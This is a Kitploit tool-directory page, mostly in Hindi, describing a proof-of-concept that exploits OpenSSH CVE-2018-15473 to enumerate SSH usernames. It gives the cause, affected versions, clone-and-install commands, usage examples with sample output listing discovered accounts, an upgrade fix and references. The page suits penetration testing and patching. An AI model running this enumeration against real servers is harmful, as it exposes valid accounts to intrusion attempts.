Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/1stpeak/cve-2018-15473
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHub1stpeak/cve-2018-15473

CVE-2018-15473

OpenSSH CVE-2018-15473 के लिए प्रूफ-ऑफ-कॉन्सेप्ट SSH उपयोगकर्ता नाम गणना एक्सप्लॉइट। थ्रेडिंग, वर्डलिस्ट, IPv6 और कमजोर सर्वरों पर मान्य खातों का पता लगाने का समर्थन करता है।

रिपॉजिटरी देखें
15 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-15473

कारण

OpenSSH सर्वर, अनुरोध वाले पैकेट को पूरी तरह से पार्स करने से पहले, एक अमान्य उपयोगकर्ता के प्रमाणीकरण को संसाधित करने में देरी नहीं करता है। यह भेद्यता auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c से संबंधित है।

शोषण

हालांकि इस भेद्यता का उपयोग मान्य उपयोगकर्ता नामों की सूची उत्पन्न करने के लिए नहीं किया जा सकता है, फिर भी इसका उपयोग उपयोगकर्ता नामों का अनुमान लगाने के लिए किया जा सकता है।

प्रभावित संस्करण

OpenSSH <= 7.7

अप्रभावित संस्करण

openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27

PoC स्थापना

आपको संभवतः अपने वितरण के समतुल्य openssl-dev पैकेज स्थापित करने की आवश्यकता हो सकती है।

root@kitploit:~
# 注意:如果您在kali上安装,则可以跳过pip安装,只需执行下面第一二三行的步骤,因为paramiko已经存在。 
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt 
# 或者使用以下命令下载安装 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

उपयोग उदाहरण

उदाहरण 1: एकल उपयोगकर्ता गणना

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!

उदाहरण 2: 10 थ्रेड्स के साथ एकाधिक उपयोगकर्ता गणना (डिफ़ॉल्ट थ्रेड 4 है)

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
आदि

उदाहरण 3: IPV6 पता और SSH पोर्ट नंबर निर्दिष्ट करना

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
आदि

समाधान

उपयोगकर्ताओं को अप्रभावित संस्करण में अपग्रेड करने की सलाह दी जाती है। OpenBSD परियोजना ने निम्नलिखित लिंक पर स्रोत कोड फिक्स जारी किया है: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0

संदर्भ

https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/

टूल डाउनलोड करें